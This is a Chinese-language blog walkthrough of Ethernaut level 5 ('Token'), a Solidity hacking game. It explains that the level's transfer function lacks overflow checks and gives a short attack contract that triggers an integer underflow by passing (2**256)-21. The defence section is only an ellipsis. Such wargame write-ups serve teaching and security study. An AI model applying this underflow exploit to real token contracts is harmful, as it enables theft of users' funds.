# 智能合约黑客攻击 Ethernaut:    5. Token

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-26
**URL:** https://paragraph.com/@leekdev/ethernaut-5-token

## Content

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目开始你有20个 Token，需要拥有更多的 Token。Hack思路合约版本是0.6，核心转账的地方没有做溢出检查，只需要特殊构建出一个数就可以绕过检查。攻击合约代码contract TokenAttack { constructor(Token _token) public { Token exploitInst = Token(_token); exploitInst.transfer(msg.sender, ((2 ** 256) - 21)); } } Hack案例…防范思路….参考资料The Parity Wallet Hack Explained

## Publication Information

- [Leek DEV](https://paragraph.com/@leekdev/): Publication homepage
- [All Posts](https://paragraph.com/@leekdev/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@leekdev): Subscribe to updates
- [Twitter](https://twitter.com/LeekDEV): Follow on Twitter